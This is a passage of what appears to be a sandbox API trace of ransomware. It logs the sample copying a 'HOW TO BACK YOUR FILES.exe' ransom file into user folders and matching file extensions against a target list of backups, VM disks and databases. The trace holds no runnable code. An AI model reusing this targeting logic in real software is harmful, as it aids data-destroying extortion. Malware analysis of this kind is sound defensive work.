lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0040.804] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Recent\\CustomDestinations\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x49ea2ca0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x49ea2ca0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccfa8 [0040.804] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0040.804] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0040.804] lstrcpyW (in: lpString1=0x2e2e8c0, lpString2="1b4dd67f29cb1962.customDestinations-ms" | out: lpString1="1b4dd67f29cb1962.customDestinations-ms") returned="1b4dd67f29cb1962.customDestinations-ms" [0040.804] lstrlenW (lpString="1b4dd67f29cb1962.customDestinations-ms") returned 38 [0040.804] lstrlenW (lpString="Ares865") returned 7 [0040.804] lstrcmpiW (lpString1="ions-ms", lpString2="Ares865") returned 1 [0040.804] lstrlenW (lpString=".dll") returned 4 [0040.804] lstrcmpiW (lpString1="1b4dd67f29cb1962.customDestinations-ms", lpString2=".dll") returned 1 [0040.804] lstrlenW (lpString=".lnk") returned 4 [0040.804] lstrcmpiW (lpString1="1b4dd67f29cb1962.customDestinations-ms", lpString2=".lnk") returned 1 [0040.804] lstrlenW (lpString=".ini") returned 4 [0040.805] lstrcmpiW (lpString1="1b4dd67f29cb1962.customDestinations-ms", lpString2=".ini") returned 1 [0040.805] lstrlenW (lpString=".sys") returned 4 [0040.805] lstrcmpiW (lpString1="1b4dd67f29cb1962.customDestinations-ms", lpString2=".sys") returned 1 [0040.805] lstrlenW (lpString="1b4dd67f29cb1962.customDestinations-ms") returned 38 [0040.805] lstrcpyW (in: lpString1=0x2e2e8c0, lpString2="5afe4de1b92fc382.customDestinations-ms" | out: lpString1="5afe4de1b92fc382.customDestinations-ms") returned="5afe4de1b92fc382.customDestinations-ms" [0040.805] lstrlenW (lpString="5afe4de1b92fc382.customDestinations-ms") returned 38 [0040.805] lstrlenW (lpString="Ares865") returned 7 [0040.805] lstrcmpiW (lpString1="ions-ms", lpString2="Ares865") returned 1 [0040.805] lstrlenW (lpString=".dll") returned 4 [0040.805] lstrcmpiW (lpString1="5afe4de1b92fc382.customDestinations-ms", lpString2=".dll") returned 1 [0040.805] lstrlenW (lpString=".lnk") returned 4 [0040.805] lstrcmpiW (lpString1="5afe4de1b92fc382.customDestinations-ms", lpString2=".lnk") returned 1 [0040.805] lstrlenW (lpString=".ini") returned 4 [0040.805] lstrcmpiW (lpString1="5afe4de1b92fc382.customDestinations-ms", lpString2=".ini") returned 1 [0040.805] lstrlenW (lpString=".sys") returned 4 [0040.805] lstrcmpiW (lpString1="5afe4de1b92fc382.customDestinations-ms", lpString2=".sys") returned 1 [0040.805] lstrlenW (lpString="5afe4de1b92fc382.customDestinations-ms") returned 38 [0040.805] lstrcpyW (in: lpString1=0x2e2e8c0, lpString2="7e4dca80246863e3.customDestinations-ms" | out: lpString1="7e4dca80246863e3.customDestinations-ms") returned="7e4dca80246863e3.customDestinations-ms" [0040.805] lstrlenW (lpString="7e4dca80246863e3.customDestinations-ms") returned 38 [0040.805] lstrlenW (lpString="Ares865") returned 7 [0040.805] lstrcmpiW (lpString1="ions-ms", lpString2="Ares865") returned 1 [0040.805] lstrlenW (lpString=".dll") returned 4 [0040.805] lstrcmpiW (lpString1="7e4dca80246863e3.customDestinations-ms", lpString2=".dll") returned 1 [0040.805] lstrlenW (lpString=".lnk") returned 4 [0040.805] lstrcmpiW (lpString1="7e4dca80246863e3.customDestinations-ms", lpString2=".lnk") returned 1 [0040.805] lstrlenW (lpString=".ini") returned 4 [0040.805] lstrcmpiW (lpString1="7e4dca80246863e3.customDestinations-ms", lpString2=".ini") returned 1 [0040.805] lstrlenW (lpString=".sys") returned 4 [0040.805] lstrcmpiW (lpString1="7e4dca80246863e3.customDestinations-ms", lpString2=".sys") returned 1 [0040.805] lstrlenW (lpString="7e4dca80246863e3.customDestinations-ms") returned 38 [0040.806] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Recent\\AutomaticDestinations", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Recent\\AutomaticDestinations") returned="C:\\Users\\Default User\\Recent\\AutomaticDestinations" [0040.806] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cb310 | out: hHeap=0x2b0000) returned 1 [0040.806] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2400 | out: hHeap=0x2b0000) returned 1 [0040.806] lstrlenW (lpString="C:\\Users\\Default User\\Recent\\AutomaticDestinations") returned 50 [0040.806] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Recent\\AutomaticDestinations" | out: lpString1="C:\\Users\\Default User\\Recent\\AutomaticDestinations") returned="C:\\Users\\Default User\\Recent\\AutomaticDestinations" [0040.806] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0040.806] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Recent\\AutomaticDestinations\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\recent\\automaticdestinations\\how to back your files.exe"), bFailIfExists=1) returned 1 [0040.812] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0040.812] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Recent\\AutomaticDestinations\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x49ec8e00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x49ec8e00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccfa8 [0040.812] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0040.812] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0040.812] lstrcpyW (in: lpString1=0x2e2e8c6, lpString2="1b4dd67f29cb1962.automaticDestinations-ms" | out: lpString1="1b4dd67f29cb1962.automaticDestinations-ms") returned="1b4dd67f29cb1962.automaticDestinations-ms" [0040.813] lstrlenW (lpString="1b4dd67f29cb1962.automaticDestinations-ms") returned 41 [0040.813] lstrlenW (lpString="Ares865") returned 7 [0040.813] lstrcmpiW (lpString1="ions-ms", lpString2="Ares865") returned 1 [0040.813] lstrlenW (lpString=".dll") returned 4 [0040.813] lstrcmpiW (lpString1="1b4dd67f29cb1962.automaticDestinations-ms", lpString2=".dll") returned 1 [0040.813] lstrlenW (lpString=".lnk") returned 4 [0040.813] lstrcmpiW (lpString1="1b4dd67f29cb1962.automaticDestinations-ms", lpString2=".lnk") returned 1 [0040.813] lstrlenW (lpString=".ini") returned 4 [0040.813] lstrcmpiW (lpString1="1b4dd67f29cb1962.automaticDestinations-ms", lpString2=".ini") returned 1 [0040.813] lstrlenW (lpString=".sys") returned 4 [0040.813] lstrcmpiW (lpString1="1b4dd67f29cb1962.automaticDestinations-ms", lpString2=".sys") returned 1 [0040.813] lstrlenW (lpString="1b4dd67f29cb1962.automaticDestinations-ms") returned 41 [0040.813] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\PrintHood", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\PrintHood") returned="C:\\Users\\Default User\\PrintHood" [0040.813] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e64c8 | out: hHeap=0x2b0000) returned 1 [0040.813] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d23e0 | out: hHeap=0x2b0000) returned 1 [0040.813] lstrlenW (lpString="C:\\Users\\Default User\\PrintHood") returned 31 [0040.813] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\PrintHood" | out: lpString1="C:\\Users\\Default User\\PrintHood") returned="C:\\Users\\Default User\\PrintHood" [0040.813] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0040.813] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\PrintHood\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\printhood\\how to back your files.exe"), bFailIfExists=1) returned 1 [0040.817] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0040.817] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\PrintHood\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x49ec8e00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x49ec8e00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccfa8 [0040.818] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0040.818] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0040.818] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Pictures", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Pictures") returned="C:\\Users\\Default User\\Pictures" [0040.818] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e6480 | out: hHeap=0x2b0000) returned 1 [0040.818] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d23c0 | out: hHeap=0x2b0000) returned 1 [0040.818] lstrlenW (lpString="C:\\Users\\Default User\\Pictures") returned 30 [0040.818] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Pictures" | out: lpString1="C:\\Users\\Default User\\Pictures") returned="C:\\Users\\Default User\\Pictures" [0040.818] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0040.818] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Pictures\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\pictures\\how to back your files.exe"), bFailIfExists=1) returned 1 [0040.823] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0040.823] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Pictures\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x49ec8e00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x49ec8e00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccfa8 [0040.823] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0040.823] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0040.823] lstrcpyW (in: lpString1=0x2e2e89e, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0040.823] lstrlenW (lpString="desktop.ini") returned 11 [0040.823] lstrlenW (lpString="Ares865") returned 7 [0040.823] lstrcmpiW (lpString1="top.ini", lpString2="Ares865") returned 1 [0040.823] lstrlenW (lpString=".dll") returned 4 [0040.824] lstrcmpiW (lpString1="desktop.ini", lpString2=".dll") returned 1 [0040.824] lstrlenW (lpString=".lnk") returned 4 [0040.824] lstrcmpiW (lpString1="desktop.ini", lpString2=".lnk") returned 1 [0040.824] lstrlenW (lpString=".ini") returned 4 [0040.824] lstrcmpiW (lpString1="desktop.ini", lpString2=".ini") returned 1 [0040.824] lstrlenW (lpString=".sys") returned 4 [0040.824] lstrcmpiW (lpString1="desktop.ini", lpString2=".sys") returned 1 [0040.824] lstrlenW (lpString="desktop.ini") returned 11 [0040.824] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\NetHood", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\NetHood") returned="C:\\Users\\Default User\\NetHood" [0040.824] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e6438 | out: hHeap=0x2b0000) returned 1 [0040.824] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d23a0 | out: hHeap=0x2b0000) returned 1 [0040.824] lstrlenW (lpString="C:\\Users\\Default User\\NetHood") returned 29 [0040.824] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\NetHood" | out: lpString1="C:\\Users\\Default User\\NetHood") returned="C:\\Users\\Default User\\NetHood" [0040.824] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0040.824] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\NetHood\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\nethood\\how to back your files.exe"), bFailIfExists=1) returned 1 [0040.829] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0040.829] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\NetHood\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x49eeef60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x49eeef60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccfa8 [0040.829] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0040.829] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0040.829] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\My Documents", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\My Documents") returned="C:\\Users\\Default User\\My Documents" [0040.829] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ee920 | out: hHeap=0x2b0000) returned 1 [0040.830] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2380 | out: hHeap=0x2b0000) returned 1 [0040.830] lstrlenW (lpString="C:\\Users\\Default User\\My Documents") returned 34 [0040.830] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\My Documents" | out: lpString1="C:\\Users\\Default User\\My Documents") returned="C:\\Users\\Default User\\My Documents" [0040.830] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0040.830] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\My Documents\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\my documents\\how to back your files.exe"), bFailIfExists=1) returned 1 [0040.835] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0040.835] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\My Documents\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfda9a36e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x49eeef60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x49eeef60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccfa8 [0040.835] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0040.835] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0040.835] lstrcpyW (in: lpString1=0x2e2e8a6, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0040.835] lstrlenW (lpString="desktop.ini") returned 11 [0040.835] lstrlenW (lpString="Ares865") returned 7 [0040.835] lstrcmpiW (lpString1="top.ini", lpString2="Ares865") returned 1 [0040.835] lstrlenW (lpString=".dll") returned 4 [0040.835] lstrcmpiW (lpString1="desktop.ini", lpString2=".dll") returned 1 [0040.835] lstrlenW (lpString=".lnk") returned 4 [0040.835] lstrcmpiW (lpString1="desktop.ini", lpString2=".lnk") returned 1 [0040.835] lstrlenW (lpString=".ini") returned 4 [0040.835] lstrcmpiW (lpString1="desktop.ini", lpString2=".ini") returned 1 [0040.835] lstrlenW (lpString=".sys") returned 4 [0040.836] lstrcmpiW (lpString1="desktop.ini", lpString2=".sys") returned 1 [0040.836] lstrlenW (lpString="desktop.ini") returned 11 [0040.836] lstrcpyW (in: lpString1=0x2e2e8a6, lpString2="My Music" | out: lpString1="My Music") returned="My Music" [0040.836] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2380 [0040.836] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x58) returned 0x2cb310 [0040.836] RtlInterlockedPushEntrySList (in: ListHead=0x2e77d0, ListEntry=0x2d2388 | out: ListHead=0x2e77d0, ListEntry=0x2d2388) returned 0x2d2368 [0040.836] FindNextFileW (in: hFindFile=0x2ccfa8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x306b6cd1, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x306b6cd1, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x306b6cd1, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Pictures", cAlternateFileName="MYPICT~1")) returned 1 [0040.836] lstrcmpiW (lpString1="My Pictures", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0040.836] lstrcmpiW (lpString1="My Pictures", lpString2="aoldtz.exe") returned 1 [0040.836] lstrcpyW (in: lpString1=0x2e2e8a6, lpString2="My Pictures" | out: lpString1="My Pictures") returned="My Pictures" [0040.836] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d23a0 [0040.836] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x5e) returned 0x2f1fc8 [0040.836] RtlInterlockedPushEntrySList (in: ListHead=0x2e77d0, ListEntry=0x2d23a8 | out: ListHead=0x2e77d0, ListEntry=0x2d23a8) returned 0x2d2388 [0040.836] FindNextFileW (in: hFindFile=0x2ccfa8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x306b6cd1, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x306b6cd1, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x306b6cd1, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 1 [0040.836] lstrcmpiW (lpString1="My Videos", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0040.836] lstrcmpiW (lpString1="My Videos", lpString2="aoldtz.exe") returned 1 [0040.836] lstrcpyW (in: lpString1=0x2e2e8a6, lpString2="My Videos" | out: lpString1="My Videos") returned="My Videos" [0040.836] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d23c0 [0040.836] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x5a) returned 0x2f2098 [0040.836] RtlInterlockedPushEntrySList (in: ListHead=0x2e77d0, ListEntry=0x2d23c8 | out: ListHead=0x2e77d0, ListEntry=0x2d23c8) returned 0x2d23a8 [0040.836] FindNextFileW (in: hFindFile=0x2ccfa8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x306b6cd1, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x306b6cd1, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x306b6cd1, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 0 [0040.836] FindClose (in: hFindFile=0x2ccfa8 | out: hFindFile=0x2ccfa8) returned 1 [0040.836] RtlInterlockedPopEntrySList (in: ListHead=0x2e77d0 | out: ListHead=0x2e77d0) returned 0x2d23c8 [0040.836] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\My Documents\\My Videos", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\My Documents\\My Videos") returned="C:\\Users\\Default User\\My Documents\\My Videos" [0040.836] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f2098 | out: hHeap=0x2b0000) returned 1 [0040.836] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d23c0 | out: hHeap=0x2b0000) returned 1 [0040.836] lstrlenW (lpString="C:\\Users\\Default User\\My Documents\\My Videos") returned 44 [0040.836] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\My Documents\\My Videos" | out: lpString1="C:\\Users\\Default User\\My Documents\\My Videos") returned="C:\\Users\\Default User\\My Documents\\My Videos" [0040.837] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0040.837] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\My Documents\\My Videos\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\my documents\\my videos\\how to back your files.exe"), bFailIfExists=1) returned 0 [0040.837] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0040.837] GetLastError () returned 0x0 [0040.837] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0040.837] ReadFile (in: hFile=0x160, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0040.837] CloseHandle (hObject=0x160) returned 1 [0040.837] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f8fb0 | out: hHeap=0x2b0000) returned 1 [0040.837] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0040.838] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\My Documents\\My Videos\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x49b82fc0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x49b82fc0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccfa8 [0040.838] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0040.838] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0040.838] lstrcpyW (in: lpString1=0x2e2e8ba, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0040.838] lstrlenW (lpString="desktop.ini") returned 11 [0040.838] lstrlenW (lpString="Ares865") returned 7 [0040.838] lstrcmpiW (lpString1="top.ini", lpString2="Ares865") returned 1 [0040.838] lstrlenW (lpString=".dll") returned 4 [0040.838] lstrcmpiW (lpString1="desktop.ini", lpString2=".dll") returned 1 [0040.838] lstrlenW (lpString=".lnk") returned 4 [0040.838] lstrcmpiW (lpString1="desktop.ini", lpString2=".lnk") returned 1 [0040.838] lstrlenW (lpString=".ini") returned 4 [0040.838] lstrcmpiW (lpString1="desktop.ini", lpString2=".ini") returned 1 [0040.838] lstrlenW (lpString=".sys") returned 4 [0040.838] lstrcmpiW (lpString1="desktop.ini", lpString2=".sys") returned 1 [0040.838] lstrlenW (lpString="desktop.ini") returned 11 [0040.838] lstrlenW (lpString="bak") returned 3 [0040.838] lstrcmpiW (lpString1="ini", lpString2="bak") returned 1 [0040.838] lstrlenW (lpString="ba_") returned 3 [0040.838] lstrcmpiW (lpString1="ini", lpString2="ba_") returned 1 [0040.838] lstrlenW (lpString="dbb") returned 3 [0040.838] lstrcmpiW (lpString1="ini", lpString2="dbb") returned 1 [0040.839] lstrlenW (lpString="vmdk") returned 4 [0040.839] lstrcmpiW (lpString1=".ini", lpString2="vmdk") returned -1 [0040.839] lstrlenW (lpString="rar") returned 3 [0040.839] lstrcmpiW (lpString1="ini", lpString2="rar") returned -1 [0040.839] lstrlenW (lpString="zip") returned 3 [0040.839] lstrcmpiW (lpString1="ini", lpString2="zip") returned -1 [0040.839] lstrlenW (lpString="tgz") returned 3 [0040.839] lstrcmpiW (lpString1="ini", lpString2="tgz") returned -1 [0040.839] lstrlenW (lpString="vbox") returned 4 [0040.839] lstrcmpiW (lpString1=".ini", lpString2="vbox") returned -1 [0040.839] lstrlenW (lpString="vdi") returned 3 [0040.839] lstrcmpiW (lpString1="ini", lpString2="vdi") returned -1 [0040.839] lstrlenW (lpString="vhd") returned 3 [0040.839] lstrcmpiW (lpString1="ini", lpString2="vhd") returned -1 [0040.839] lstrlenW (lpString="vhdx") returned 4 [0040.839] lstrcmpiW (lpString1=".ini", lpString2="vhdx") returned -1 [0040.839] lstrlenW (lpString="avhd") returned 4 [0040.839] lstrcmpiW (lpString1=".ini", lpString2="avhd") returned -1 [0040.839] lstrlenW (lpString="db") returned 2 [0040.839] lstrcmpiW (lpString1="ni", lpString2="db") returned 1 [0040.839] lstrlenW (lpString="db2") returned 3 [0040.839] lstrcmpiW (lpString1="ini", lpString2="db2") returned 1 [0040.839] lstrlenW (lpString="db3") returned 3 [0040.839] lstrcmpiW (lpString1="ini", lpString2="db3") returned 1 [0040.839] lstrlenW (lpString="dbf") returned 3 [0040.839] lstrcmpiW (lpString1="ini", lpString2="dbf") returned 1 [0040.839] lstrlenW (lpString="mdf") returned 3 [0040.839] lstrcmpiW (lpString1="ini", lpString2="mdf") returned -1 [0040.839] lstrlenW (lpString="mdb") returned 3 [0040.839] lstrcmpiW (lpString1="ini", lpString2="mdb") returned -1 [0040.839] lstrlenW (lpString="sql") returned 3 [0040.839] lstrcmpiW (lpString1="ini", lpString2="sql") returned -1 [0040.839] lstrlenW (lpString="sqlite") returned 6 [0040.839] lstrcmpiW (lpString1="op.ini", lpString2="sqlite") returned -1 [0040.839] lstrlenW 